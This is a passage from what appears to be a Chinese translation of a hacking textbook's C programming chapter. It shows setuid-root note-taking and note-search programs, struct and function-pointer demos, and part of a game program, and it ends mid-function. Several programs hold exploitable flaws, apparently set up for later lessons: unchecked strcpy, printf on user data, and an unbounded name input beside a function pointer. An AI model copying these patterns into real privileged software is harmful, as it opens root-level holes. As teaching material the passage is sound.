-rwsr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $ ./uid_demo 
real uid: 999
effective uid: 0 
reader@hacking:~/booksrc $

由于程序现在属于 root 用户，因此必须使用 sudo 来更改其文件权限。chmod u+s 命令开启了 setuid 权限，这在下面的 ls -l 输出中可以看到。现在当用户 reader 执行 uid_demo 时，有效用户 ID 为 0（root），这意味着程序可以以 root 身份访问文件。这就是 chsh 程序能够允许任何用户更改其存储在 /etc/passwd 中的登录 shell 的原因。

这种相同的技术可以用于多用户笔记程序中。下一个程序将是 simplenote 程序的修改版；它还将记录每个笔记原始作者的用户 ID。此外，将引入新的 #include 语法。

ec_malloc() 和 fatal() 函数在我们的许多程序中都很有用。与其将这些函数复制粘贴到每个程序中，不如将它们放入一个单独的包含文件中。

hacking.h

// A function to display an error message and then exit
void fatal(char *message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message, 83);
   perror(error_message);
   exit(-1);
}

// An error-checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr;
}

在这个新程序 hacking.h 中，函数可以直接包含。在 C 语言中，当 #include 的文件名被 < 和 > 包围时，编译器会在标准包含路径中查找此文件，例如 /usr/include/。如果文件名被引号包围，编译器会在当前目录中查找。因此，如果 hacking.h 与程序在同一个目录中，可以通过输入 #include "hacking.h" 来与该程序一起包含。

新的 notetaker 程序（notetaker.c）中更改的行以粗体显示。

notetaker.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
`#include "hacking.h"`

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <data to add to %s>\n", prog_name, filename);
   exit(0);
}

void fatal(char *);            // A function for fatal errors
void *ec_malloc(unsigned int); // An error-checked malloc() wrapper

int main(int argc, char *argv[]) {
   `int userid, fd; // File descriptor`
   char *buffer, *datafile;

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   `strcpy(datafile, "/var/notes");`

   if(argc < 2)                // If there aren't command-line arguments,
      usage(argv[0], datafile); // display usage message and exit.

   strcpy(buffer, argv[1]);  // Copy into buffer.

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

 // Opening the file
   fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
   if(fd == -1)
      fatal("in main() while opening file");
   printf("[DEBUG] file descriptor is %d\n", fd);

   `userid = getuid(); // Get the real user ID.`

// Writing data
   `if(write(fd, &userid, 4) == -1) // Write user ID before note data.       fatal("in main() while writing userid to file");    write(fd, "\n", 1); // Terminate line.     if(write(fd, buffer, strlen(buffer)) == -1) // Write note.       fatal("in main() while writing buffer to file");    write(fd, "\n", 1); // Terminate line.`

// Closing file
   if(close(fd) == -1)
      fatal("in main() while closing file");

   printf("Note has been saved.\n");
   free(buffer);
   free(datafile); 
}

输出文件已从 /tmp/notes 更改为 /var/notes，因此数据现在存储在一个更永久的位置。使用 getuid() 函数获取真实用户 ID，该 ID 写在笔记行之前的数据文件中。由于 write() 函数期望一个源指针，因此对整数值 userid 使用 & 运算符以提供其地址。

reader@hacking:~/booksrc $ gcc -o notetaker notetaker.c
reader@hacking:~/booksrc $ sudo chown root:root ./notetaker
reader@hacking:~/booksrc $ sudo chmod u+s ./notetaker
reader@hacking:~/booksrc $ ls -l ./notetaker
-rwsr-xr-x 1 root root 9015 2007-09-07 05:48 ./notetaker
reader@hacking:~/booksrc $ ./notetaker "this is a test of multiuser notes"
[DEBUG] buffer   @ 0x804a008: 'this is a test of multiuser notes'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ls -l /var/notes
-rw------- 1 root reader 39 2007-09-07 05:49 /var/notes
reader@hacking:~/booksrc $

在前面的输出中，notetaker 程序被编译并更改为主属为 root，并设置了 setuid 权限。现在当程序执行时，程序以 root 用户身份运行，因此当创建文件 /var/notes 时，它也由 root 拥有。

reader@hacking:~/booksrc $ cat /var/notes
cat: /var/notes: Permission denied
reader@hacking:~/booksrc $ sudo cat /var/notes
?
this is a test of multiuser notes
reader@hacking:~/booksrc $ sudo hexdump -C /var/notes
00000000  `e7 03 00 00` 0a 74 68 69  73 20 69 73 20 61 20 74  |.....this is a t|
00000010  65 73 74 20 6f 66 20 6d  75 6c 74 69 75 73 65 72  |est of multiuser|
00000020  20 6e 6f 74 65 73 0a                              | notes.|
00000027
reader@hacking:~/booksrc $ pcalc 0x03e7
        999             0x3e7           0y1111100111
reader@hacking:~/booksrc $

/var/notes 文件包含读者的用户 ID（999）和笔记。由于小端架构，整数 999 的 4 个字节在十六进制中显示为反转（如上粗体所示）。

为了使普通用户能够读取笔记数据，需要一个相应的 setuid root 程序。notesearch.c 程序将读取笔记数据，并且只显示由该用户 ID 编写的笔记。此外，还可以提供一个可选的命令行参数作为搜索字符串。当使用此参数时，只有与搜索字符串匹配的笔记将被显示。

notesearch.c

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"
#define FILENAME "/var/notes"

int print_notes(int, int, char *);   // Note printing function.
int find_user_note(int, int);        // Seek in file for a note for user.
int search_note(char *, char *);     // Search for keyword function.
void fatal(char *);                  // Fatal error handler

int main(int argc, char *argv[]) {
   int userid, printing=1, fd; // File descriptor
   char searchstring[100];

   if(argc > 1)                        // If there is an arg,
      strcpy(searchstring, argv[1]);   //   that is the search string;
   else                                // otherwise,
      searchstring[0] = 0;             //   search string is empty.

   userid = getuid();
   fd = open(FILENAME, O_RDONLY);   // Open the file for read-only access.
   if(fd == -1)
      fatal("in main() while opening file for reading");

   while(printing)
      printing = print_notes(fd, userid, searchstring);
   printf("-------[ end of note data ]-------\n");
   close(fd);
}

// A function to print the notes for a given uid that match
// an optional search string;
// returns 0 at end of file, 1 if there are still more notes.
int print_notes(int fd, int uid, char *searchstring) {
   int note_length;
   char byte=0, note_buffer[100];

   note_length = find_user_note(fd, uid);
   if(note_length == -1)  // If end of file reached,
      return 0;           //   return 0.

   read(fd, note_buffer, note_length); // Read note data.
   note_buffer[note_length] = 0;       // Terminate the string.

   if(search_note(note_buffer, searchstring)) // If searchstring found,
      printf(note_buffer);                    //   print the note.
   return 1;
}

// A function to find the next note for a given userID;
// returns -1 if the end of the file is reached;
// otherwise, it returns the length of the found note.
int find_user_note(int fd, int user_uid) {
   int note_uid=-1;
   unsigned char byte;
   int length;

   while(note_uid != user_uid) {  // Loop until a note for user_uid is found.

      if(read(fd, &note_uid, 4) != 4) // Read the uid data.
         return -1; // If 4 bytes aren't read, return end of file code.
      if(read(fd, &byte, 1) != 1) // Read the newline separator.
         return -1;

      byte = length = 0;
      while(byte != '\n') {  // Figure out how many bytes to the end of line.
         if(read(fd, &byte, 1) != 1) // Read a single byte.
            return -1;     // If byte isn't read, return end of file code.
         length++;
      }
   }
   lseek(fd, length * -1, SEEK_CUR); // Rewind file reading by length bytes.

   printf("[DEBUG] found a %d byte note for user id %d\n", length, note_uid);
   return length;
}

// A function to search a note for a given keyword;
// returns 1 if a match is found, 0 if there is no match.
int search_note(char *note, char *keyword) {
   int i, keyword_length, match=0;

   keyword_length = strlen(keyword);
   if(keyword_length == 0)  // If there is no search string,
      return 1;              // always "match".

   for(i=0; i < strlen(note); i++) { // Iterate over bytes in note.
      if(note[i] == keyword[match])  // If byte matches keyword,
         match++;   // get ready to check the next byte;
      else {        //   otherwise,
         if(note[i] == keyword[0]) // if that byte matches first keyword byte,
            match = 1;  // start the match count at 1.
         else
            match = 0;  // Otherwise it is zero.
      }
      if(match == keyword_length) // If there is a full match,
         return 1;   // return matched.
   }
   return 0;  // Return not matched.
}

大部分代码应该是有意义的，但有一些新概念。文件名在顶部定义，而不是使用堆内存。此外，使用 lseek() 函数来重置文件中的读取位置。函数调用 lseek(fd, length * -1, SEEK_CUR); 告诉程序将读取位置向前移动 length * -1 个字节。由于这会变成一个负数，因此位置会向后移动 length 个字节。

reader@hacking:~/booksrc $ gcc -o notesearch notesearch.c
reader@hacking:~/booksrc $ sudo chown root:root ./notesearch
reader@hacking:~/booksrc $ sudo chmod u+s ./notesearch
reader@hacking:~/booksrc $ ./notesearch
[DEBUG] found a 34 byte note for user id 999
this is a test of multiuser notes
-------[ end of note data ]------- 
reader@hacking:~/booksrc $

当编译并设置 setuid 为 root 时，notesearch 程序按预期工作。但这只是一个单一用户；如果不同的用户使用 notetaker 和 notesearch 程序会发生什么？

reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $ ./notetaker "This is a note for jose"
[DEBUG] buffer   @ 0x804a008: 'This is a note for jose'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
jose@hacking:/home/reader/booksrc $ ./notesearch 
[DEBUG] found a 24 byte note for user id 501
This is a note for jose
-------[ end of note data ]------- 
jose@hacking:/home/reader/booksrc $

当用户 jose 使用这些程序时，真实用户 ID 是 501。这意味着该值将添加到所有使用 notetaker 编写的笔记中，并且只有具有匹配用户 ID 的笔记将由 notesearch 程序显示。

reader@hacking:~/booksrc $ ./notetaker "This is another note for the reader user"
[DEBUG] buffer   @ 0x804a008: 'This is another note for the reader user'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch 
[DEBUG] found a 34 byte note for user id 999
this is a test of multiuser notes
[DEBUG] found a 41 byte note for user id 999
This is another note for the reader user
-------[ end of note data ]------- 
reader@hacking:~/booksrc $

类似地，所有面向用户读者的笔记都附有用户 ID 999。尽管笔记记录程序和笔记搜索程序都是suidroot，并且对/var/notes数据文件具有完全的读写权限，但笔记搜索程序中的程序逻辑阻止当前用户查看其他用户的笔记。这非常类似于/etc/passwd文件存储所有用户的信息，而像chsh和passwd这样的程序允许任何用户更改自己的 shell 或密码。

结构体

有时候，应该将多个变量分组在一起并作为一个整体处理。在 C 语言中，结构体是包含许多其他变量的变量。结构体经常被各种系统函数和库使用，因此理解如何使用结构体是使用这些函数的先决条件。

现在用一个简单的例子就足够了。在处理许多时间函数时，这些函数使用一个名为tm的时间结构体，该结构体在/usr/include/time.h中定义。结构体的定义如下。

	struct tm {
	     int     tm_sec;        /* seconds */
	     int     tm_min;        /* minutes */
	     int     tm_hour;       /* hours */
	     int     tm_mday;       /* day of the month */
	     int     tm_mon;        /* month */
	     int     tm_year;       /* year */
	     int     tm_wday;       /* day of the week */
	     int     tm_yday;       /* day in the year */
	     int     tm_isdst;      /* daylight saving time */ 
	};

在定义了这个结构体之后，struct tm成为一个可用的变量类型，可以用来声明具有tm结构体数据类型的变量和指针。time_example.c 程序演示了这一点。当包含time.h头文件时，tm结构体被定义，之后用于声明current_time和time_ptr变量。

time_example.c

#include <stdio.h>
#include <time.h>

int main() {
   long int seconds_since_epoch;
   struct tm current_time, *time_ptr;
   int hour, minute, second, day, month, year;

   seconds_since_epoch = time(0); // Pass time a null pointer as argument.
   printf("time() - seconds since epoch: %ld\n", seconds_since_epoch);

   time_ptr = &current_time;  // Set time_ptr to the address of
                              // the current_time struct.
   localtime_r(&seconds_since_epoch, time_ptr);

   // Three different ways to access struct elements:
   hour = current_time.tm_hour;  // Direct access
   minute = time_ptr->tm_min;    // Access via pointer
   second = *((int *) time_ptr); // Hacky pointer access

   printf("Current time is: %02d:%02d:%02d\n", hour, minute, second); 
}

time() 函数将返回自 1970 年 1 月 1 日以来的秒数。Unix 系统中的时间相对于这个相当任意的时刻来保持，这也被称为纪元。localtime_r() 函数期望两个指针作为参数：一个是指自纪元以来的秒数，另一个是指向 tm 结构体的指针。指针 time_ptr 已经被设置为 current_time 的地址，一个空的 tm 结构体。使用地址运算符提供 seconds_since_epoch 的指针作为 localtime_r() 的另一个参数，它填充了 tm 结构体的元素。结构体的元素可以通过三种不同的方式访问；前两种是访问结构体元素的正确方式，第三种是一个修改过的解决方案。如果使用结构体变量，可以通过将元素名称添加到变量名称的末尾并使用点号来访问其元素。因此，current_time.tm_hour 将访问名为 current_time 的 tm 结构体中的 tm_hour 元素。结构体指针通常被使用，因为传递一个四字节的指针比传递整个数据结构要高效得多。结构体指针如此常见，以至于 C 语言内置了一种方法，可以从结构体指针访问结构体元素，而无需解引用指针。当使用结构体指针如 time_ptr 时，可以通过结构体元素名称以类似的方式访问结构体元素，但使用一系列看起来像指向右方的箭头的字符。因此，time_ptr->tm_min 将访问 time_ptr 所指向的 tm 结构体中的 tm_min 元素。秒数可以通过这些正确的方法之一访问，使用 tm_sec 元素或 tm 结构体，但使用了第三种方法。你能弄清楚这种第三种方法是如何工作的吗？

reader@hacking:~/booksrc $ gcc time_example.c
reader@hacking:~/booksrc $ ./a.out
time() - seconds since epoch: 1189311588
Current time is: 04:19:48
reader@hacking:~/booksrc $ ./a.out
time() - seconds since epoch: 1189311600
Current time is: 04:20:00
reader@hacking:~/booksrc $

程序按预期工作，但在 tm 结构体中是如何访问秒数的呢？记住，最终，这都只是内存。由于 tm_sec 在 tm 结构体的开头定义，这个整数值也在开头。在 second = *((int *) time_ptr) 这一行中，变量 time_ptr 被从 tm 结构体指针转换为整数指针。然后这个转换后的指针被解引用，返回指针地址处的数据。由于 tm 结构体的地址也指向这个结构体的第一个元素，这将检索结构体中 tm_sec 的整数值。time_example.c 代码（time_example2.c）的以下添加部分也输出了 current_time 的字节。这表明 tm 结构体的元素在内存中紧挨着。结构体中更低的元素也可以通过简单地增加指针的地址来直接通过指针访问。

time_example2.c

#include <stdio.h>
#include <time.h>

void dump_time_struct_bytes(struct tm *time_ptr, int size) {
   int i;
   unsigned char *raw_ptr;
   printf("bytes of struct located at 0x%08x\n", time_ptr);
   raw_ptr = (unsigned char *) time_ptr;
   for(i=0; i < size; i++)
   {
      printf("%02x ", raw_ptr[i]);
      if(i%16 == 15) // Print a newline every 16 bytes.
         printf("\n");
   }
   printf("\n");
}

int main() {
   long int seconds_since_epoch;
   struct tm current_time, *time_ptr;
   int hour, minute, second, i, *int_ptr;

   seconds_since_epoch = time(0); // Pass time a null pointer as argument.
   printf("time() - seconds since epoch: %ld\n", seconds_since_epoch);

   time_ptr = &current_time;  // Set time_ptr to the address of
                              // the current_time struct.
   localtime_r(&seconds_since_epoch, time_ptr);

   // Three different ways to access struct elements:
   hour = current_time.tm_hour;  // Direct access
   minute = time_ptr->tm_min;    // Access via pointer
   second = *((int *) time_ptr); // Hacky pointer access

   printf("Current time is: %02d:%02d:%02d\n", hour, minute, second);

   dump_time_struct_bytes(time_ptr, sizeof(struct tm));

   minute = hour = 0;  // Clear out minute and hour.
   int_ptr = (int *) time_ptr;

   for(i=0; i < 3; i++) {
      printf("int_ptr @ 0x%08x : %d\n", int_ptr, *int_ptr);
      int_ptr++; // Adding 1 to int_ptr adds 4 to the address,
   }             // since an int is 4 bytes in size. 
}

编译并执行 time_example2.c 的结果如下。

reader@hacking:~/booksrc $ gcc -g time_example2.c
reader@hacking:~/booksrc $ ./a.out
time() - seconds since epoch: 1189311744
Current time is: 04:22:24
bytes of struct located at 0xbffff7f0
18 00 00 00 16 00 00 00 04 00 00 00 09 00 00 00
08 00 00 00 6b 00 00 00 00 00 00 00 fb 00 00 00
00 00 00 00 00 00 00 00 28 a0 04 08
int_ptr @ 0xbffff7f0 : 24
int_ptr @ 0xbffff7f4 : 22
int_ptr @ 0xbffff7f8 : 4
reader@hacking:~/booksrc $

虽然可以通过这种方式访问结构体的内存，但会假设结构体中变量的类型以及变量之间没有填充。由于结构体元素的类型数据也存储在结构体中，因此使用适当的方法访问结构体元素要容易得多。

函数指针

指针简单地包含一个内存地址，并赋予一个描述它指向位置的数据类型。通常，指针用于变量；然而，它们也可以用于函数。funcptr_example.c程序演示了函数指针的使用。

funcptr_example.c

#include <stdio.h>

int func_one() {
   printf("This is function one\n");
   return 1;
}

int func_two() {
   printf("This is function two\n");
   return 2;
}

int main() {
   int value;
   int (*function_ptr) ();

   function_ptr = func_one;
   printf("function_ptr is 0x%08x\n", function_ptr);
   value = function_ptr();
   printf("value returned was %d\n", value);

   function_ptr = func_two;
   printf("function_ptr is 0x%08x\n", function_ptr);
   value = function_ptr();
   printf("value returned was %d\n", value); 
}

在这个程序中，在main()函数中声明了一个名为function_ptr的函数指针。然后这个指针被设置为指向函数func_one()，并调用它；之后它又被设置并用于调用func_two()。下面的输出显示了此源代码的编译和执行过程。

reader@hacking:~/booksrc $ gcc funcptr_example.c
reader@hacking:~/booksrc $ ./a.out
function_ptr is 0x08048374
This is function one
value returned was 1
function_ptr is 0x0804838d
This is function two
value returned was 2 
reader@hacking:~/booksrc $

伪随机数

由于计算机是确定性机器，它们无法产生真正的随机数。但许多应用程序需要某种形式的随机性。伪随机数生成函数通过生成一个伪随机数流来满足这一需求。这些函数可以从一个种子数开始生成一个看似随机的数列；然而，使用相同的种子可以再次生成相同的序列。确定性机器无法产生真正的随机性，但如果伪随机生成函数的种子值未知，序列将看起来是随机的。生成器必须使用srand()函数用值初始化，从那时起，rand()函数将返回一个从 0 到RAND_MAX的伪随机数。这些函数和RAND_MAX在stdlib.h中定义。虽然rand()返回的数字看起来是随机的，但它们依赖于提供给srand()的种子值。为了在后续程序执行之间保持伪随机性，随机化器每次都必须用不同的值初始化。一种常见的做法是使用自纪元以来的秒数（由time()函数返回）作为种子。rand_example.c程序演示了这种技术。

rand_example.c

#include <stdio.h>
#include <stdlib.h>

int main() {
   int i;
   printf("RAND_MAX is %u\n", RAND_MAX);
   srand(time(0));

   printf("random values from 0 to RAND_MAX\n");
   for(i=0; i < 8; i++)
      printf("%d\n", rand());
   printf("random values from 1 to 20\n");
   for(i=0; i < 8; i++)
      printf("%d\n", (rand()%20)+1); 
}

注意模运算符是如何用来从 1 到 20 获取随机值的。

reader@hacking:~/booksrc $ gcc rand_example.c
reader@hacking:~/booksrc $ ./a.out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
815015288
1315541117
2080969327
450538726
710528035
907694519
1525415338
1843056422
random values from 1 to 20
2
3
8
5
9
1
4
20
reader@hacking:~/booksrc $ ./a.out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
678789658
577505284
1472754734
2134715072
1227404380
1746681907
341911720
93522744
random values from 1 to 20
6
16
12
19
8
19
2
1
reader@hacking:~/booksrc $

程序的输出仅显示随机数。伪随机性也可以用于更复杂的程序，正如本节最后脚本中将看到的那样。

一个机会游戏

本节最后的程序是一系列使用我们讨论过的许多概念的随机游戏。程序使用伪随机数生成器函数来提供随机元素。它有三个不同的游戏函数，这些函数通过一个全局函数指针调用，并且它使用结构体来保存玩家的数据，这些数据保存在一个文件中。多用户文件权限和用户 ID 允许多个用户玩游戏并维护他们自己的账户数据。game_of_chance.c 程序代码有大量的文档，你应该能够在这个阶段理解它。

game_of_chance.c

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>
#include <stdlib.h>
#include "hacking.h"

#define DATAFILE "/var/chance.data" // File to store user data

// Custom user struct to store information about users
struct user {
   int uid;
   int credits;
   int highscore;
   char name[100];
   int (*current_game) ();
};

// Function prototypes
int get_player_data();
void register_new_player();
void update_player_data();
void show_highscore();
void jackpot();
void input_name();
void print_cards(char *, char *, int);
int take_wager(int, int);
void play_the_game();
int pick_a_number();
int dealer_no_match();
int find_the_ace();
void fatal(char *);

// Global variables
struct user player;      // Player struct

int main() {
   int choice, last_game;

   srand(time(0)); // Seed the randomizer with the current time.

   if(get_player_data() == -1)  // Try to read player data from file.
      register_new_player();    // If there is no data, register a new player.

   while(choice != 7) {
      printf("-=[ Game of Chance Menu ]=-\n");
      printf("1 - Play the Pick a Number game\n");
      printf("2 - Play the No Match Dealer game\n");
      printf("3 - Play the Find the Ace game\n");
      printf("4 - View current high score\n");
      printf("5 - Change your user name\n");
      printf("6 - Reset your account at 100 credits\n");
      printf("7 - Quit\n");
      printf("[Name: %s]\n", player.name);
      printf("[You have %u credits] ->  ", player.credits);
      scanf("%d", &choice);

      if((choice < 1) || (choice > 7))
         printf("\n[!!] The number %d is an invalid selection.\n\n", choice);
      else if (choice < 4) {          // Otherwise, choice was a game of some sort.
            if(choice != last_game) { // If the function ptr isn't set
               if(choice == 1)        // then point it at the selected game
                  player.current_game = pick_a_number;
               else if(choice == 2)
                  player.current_game = dealer_no_match;
               else
                  player.current_game = find_the_ace;
               last_game = choice;    // and set last_game.
            }
            play_the_game();          // Play the game.
         }
      else if (choice == 4)
         show_highscore();
      else if (choice == 5) {
         printf("\nChange user name\n");
         printf("Enter your new name: ");
         input_name();
         printf("Your name has been changed.\n\n");
      }
      else if (choice == 6) {
         printf("\nYour account has been reset with 100 credits.\n\n");
         player.credits = 100;
      }
   }
   update_player_data();
   printf("\nThanks for playing! Bye.\n");
}

// This function reads the player data for the current uid
// from the file. It returns -1 if it is unable to find player
// data for the current uid.
int get_player_data() { 
   int fd, uid, read_bytes;
   struct user entry;

   uid = getuid();

   fd = open(DATAFILE, O_RDONLY);
   if(fd == -1) // Can't open the file, maybe it doesn't exist
      return -1;
   read_bytes = read(fd, &entry, sizeof(struct user));    // Read the first chunk.
   while(entry.uid != uid && read_bytes > 0) { // Loop until proper uid is found.
      read_bytes = read(fd, &entry, sizeof(struct user)); // Keep reading.
   }
   close(fd); // Close the file.
   if(read_bytes  < sizeof(struct user)) // This means that the end of file was reached.
      return -1;
   else
      player = entry; // Copy the read entry into the player struct.
   return 1;          // Return a success.
}

// This is the new user registration function.
// It will create a new player account and append it to the file.
void register_new_player()  { 
   int fd;

   printf("-=-={ New Player Registration }=-=-\n");
   printf("Enter your name: ");
   input_name();

   player.uid = getuid();
   player.highscore = player.credits = 100;

   fd = open(DATAFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
   if(fd == -1)
      fatal("in register_new_player() while opening file");
   write(fd, &player, sizeof(struct user));
   close(fd);

   printf("\nWelcome to the Game of Chance %s.\n", player.name);
   printf("You have been given %u credits.\n", player.credits);
}

// This function writes the current player data to the file.
// It is used primarily for updating the credits after games.
void update_player_data() {
   int fd, i, read_uid;
   char burned_byte;

   fd = open(DATAFILE, O_RDWR);
   if(fd == -1) // If open fails here, something is really wrong.
      fatal("in update_player_data() while opening file");
   read(fd, &read_uid, 4);          // Read the uid from the first struct.
   while(read_uid != player.uid) {  // Loop until correct uid is found.
      for(i=0; i < sizeof(struct user) - 4; i++) // Read through the
         read(fd, &burned_byte, 1);             // rest of that struct.
      read(fd, &read_uid, 4);      // Read the uid from the next struct. 
   }
   write(fd, &(player.credits), 4);   // Update credits.
   write(fd, &(player.highscore), 4); // Update highscore.
   write(fd, &(player.name), 100);    // Update name.
   close(fd);
}

// This function will display the current high score and
// the name of the person who set that high score.
void show_highscore() {
   unsigned int top_score = 0;
   char top_name[100];
   struct user entry;
   int fd;

   printf("\n====================| HIGH SCORE |====================\n");
   fd = open(DATAFILE, O_RDONLY);
   if(fd == -1)
      fatal("in show_highscore() while opening file");
   while(read(fd, &entry, sizeof(struct user)) > 0) { // Loop until end of file.
      if(entry.highscore > top_score) {   // If there is a higher score,
            top_score = entry.highscore;  // set top_score to that score
            strcpy(top_name, entry.name); // and top_name to that username.
         }
   }
   close(fd);
   if(top_score > player.highscore)
      printf("%s has the high score of %u\n", top_name, top_score);
   else
      printf("You currently have the high score of %u credits!\n", player.highscore);
   printf("======================================================\n\n");
}

// This function simply awards the jackpot for the Pick a Number game.
void jackpot() {
   printf("*+*+*+*+*+* JACKPOT *+*+*+*+*+*\n");
   printf("You have won the jackpot of 100 credits!\n");
   player.credits += 100;
}

// This function is used to input the player name, since 
// scanf("%s", &whatever) will stop input at the first space.
void input_name() {
   char *name_ptr, input_char='\n';
   while(input_char == '\n')    // Flush any leftover 
      scanf("%c", &input_char); // newline chars.

   name_ptr = (char *) &(player.name); // name_ptr = player name's address
   while(input_char != '\n') {  // Loop until newline.
      *name_ptr = input_char;   // Put the input char into name field.
      scanf("%c", &input_char); // Get the next char.
      name_ptr++;               // Increment the name pointer.
   }
   *name_ptr = 0;  // Terminate the string.
}

// This function prints the 3 cards for the Find the Ace game.
// It expects a message to display, a pointer to the cards array,
// and the card the user has picked as input. If the user_pick is
// -1, then the selection numbers are displayed.
void print_cards(char *message, char *cards, int user_pick) {
   int i;

   printf("\n\t*** %s ***\n", message);
   printf("      \t._.\t._.\t._.\n");
   printf("Cards:\t|%c|\t|%c|\t|%c|\n\t", cards[0], cards[1], cards[2]);
   if(user_pick == -1)
      printf(" 1 \t 2 \t 3\n");
   else {
      for(i=0; i < user_pick; i++)
         printf("\t");
      printf(" ^-- your pick\n");
   }
}

// This function inputs wagers for both the No Match Dealer and
// Find the Ace games. It expects the available credits and the
// previous wager as arguments. The previous_wager is only important
// for the second wager in the Find the Ace game. The function
// returns -1 if the wager is too big or too little, and it returns
// the wager amount otherwise.
int take_wager(int available_credits, int previous_wager) {
   int wager, total_wager;

   printf("How many of your %d credits would you like to wager?  ", available_credits);
   scanf("%d", &wager);
   if(wager < 1) {   // Make sure the wager is greater than 0.
      printf("Nice try, but you must wager a positive number!\n");
      return -1;
   }
   total_wager = previous_wager + wager;
   if(total_wager > available_credits) {  // Confirm available credits
      printf("Your total wager of %d is more than you have!\n", total_wager);
      printf("You only have %d available credits, try again.\n", available_credits);
      return -1;
   }
   return wager;
}

// This function contains a loop to allow the current game to be
// played again. It also writes the new credit totals to file
// after each game is played.
void play_the_game() { 
   int play_again = 1;
   int (*game) ();
   char selection;

   while(play_again) {
      printf("\n[DEBUG] current_game pointer @ 0x%08x\n", player.current_game);
      if(player.current_game() != -1) {         // If the game plays without error and
         if(player.credits > player.highscore)  // a new high score is set,
            player.highscore = player.credits;  // update the highscore.
         printf("\nYou now have %u credits\n", player.credits);
         update_player_data();                  // Write the new credit total to file.
         printf("Would you like to play again? (y/n)  ");
         selection = '\n';
         while(selection == '\n')               // Flush any extra newlines.
            scanf("%c", &selection);
         if(selection == 'n')
            play_again = 0;
      }
      else               // This means the game returned an error,
         play_again = 0; // so return to main menu.
   }
}

// This function is the Pick a Number game.
// It returns -1 if the player doesn't have enough credits.
int pick_a_number() { 
   int pick, winning_number;

   printf("\n####### Pick a Number ######\n");
   printf("This game costs 10 credits to play. Simply pick a number\n");
   printf("between 1 and 20, and if you pick the winning number, you\n");
   printf("will win the jackpot of 100 credits!\n\n");
   winning_number = (rand() % 20) + 1; // Pick a number between 1 and 20.
   if(player.credits < 10) {
      printf("You only have %d credits. That's not enough to play!\n\n", player.credits);
      return -1;  // Not enough credits to play 
   }
   player.credits -= 10; // Deduct 10 credits.
   printf("10 credits have been deducted from your account.\n");
   printf("Pick a number between 1 and 20: ");
   scanf("%d", &pick);

   printf("The winning number is %d\n", winning_number);
   if(pick == winning_number)
      jackpot();
   else
      printf("Sorry, you didn't win.\n");
   return 0;
}

// This is the No Match Dealer game.
// It returns -1 if the player has 0 credits.
int dealer_no_match() { 
   int i, j, numbers[16], wager = -1, match = -1;

   printf("\n::::::: No Match Dealer :::::::\n");
   printf("In this game, you can wager up to all of your credits.\n");
   printf("The dealer will deal out 16 random numbers between 0 and 99.\n");
   printf("If there are no matches among them, you double your money!\n\n");

   if(player.credits == 0) {
      printf("You don't have any credits to wager!\n\n");
      return -1;
   }
   while(wager == -1)
      wager = take_wager(player.credits, 0);

   printf("\t\t::: Dealing out 16 random numbers :::\n");
   for(i=0; i < 16; i++) {
      numbers[i] = rand() % 100; // Pick a number between 0 and 99.
      printf("%2d\t", numbers[i]);
      if(i%8 == 7)               // Print a line break every 8 numbers.
         printf("\n");
   }
   for(i=0; i < 15; i++) {       // Loop looking for matches.
      j = i + 1;
      while(j < 16) {
         if(numbers[i] == numbers[j])
            match = numbers[i];
         j++;
      }
   }
   if(match != -1) {
      printf("The dealer matched the number %d!\n", match);
      printf("You lose %d credits.\n", wager);
      player.credits -= wager;
   } else {
      printf("There were no matches! You win %d credits!\n", wager);
      player.credits += wager;
   }
   return 0;
}

// This is the Find the Ace game.
// It returns -1 if the player has 0 credits.
int find_the_ace() {
   int i, ace, total_wager;
   int invalid_choice, pick = -1, wager_one = -1, wager_two = -1;
   char choice_two, cards[3] = {'X', 'X', 'X'};

   ace = rand()%3; // Place the ace randomly.

   printf("******* Find the Ace *******\n");
   printf("In this game, you can wager up to all of your credits.\n");
   printf("Three cards will be dealt out, two queens and one ace.\n");
   printf("If you find the ace, you will win your wager.\n");
   printf("After choosing a card, one of the queens will be revealed.\n");
   printf("At this point, you may either select a different card or\n");
   printf("increase your wager.\n\n");

   if(player.credits == 0) {
      printf("You don't have any credits to wager!\n\n");
      return -1;
   }

   while(wager_one == -1) // Loop until valid wager is made.
      wager_one = take_wager(player.credits, 0);

   print_cards("Dealing cards", cards, -1);
   pick = -1;
   while((pick < 1) || (pick > 3)) { // Loop until valid pick is made.
      printf("Select a card: 1, 2, or 3  ");
      scanf("%d", &pick);
   }
   pick--; // Adjust the pick since card numbering starts at 0.
   i=0;
   while(i == ace || i == pick) // Keep looping until
      i++;                      // we find a valid queen to reveal.
   cards[i] = 'Q';
   print_cards("Revealing a queen", cards, pick);
   invalid_choice = 1;
   while(invalid_choice) {       // Loop until valid choice is made.
      printf("Would you like to:\n[c]hange your pick\tor\t[i]ncrease your wager?\n");
      printf("Select c or i:  ");
      choice_two = '\n';
      while(choice_two == '\n')  // Flush extra newlines.
         scanf("%c", &choice_two);
      if(choice_two == 'i') {    // Increase wager.
            invalid_choice=0;    // This is a valid choice.
            while(wager_two == -1)   // Loop until valid second wager is made.
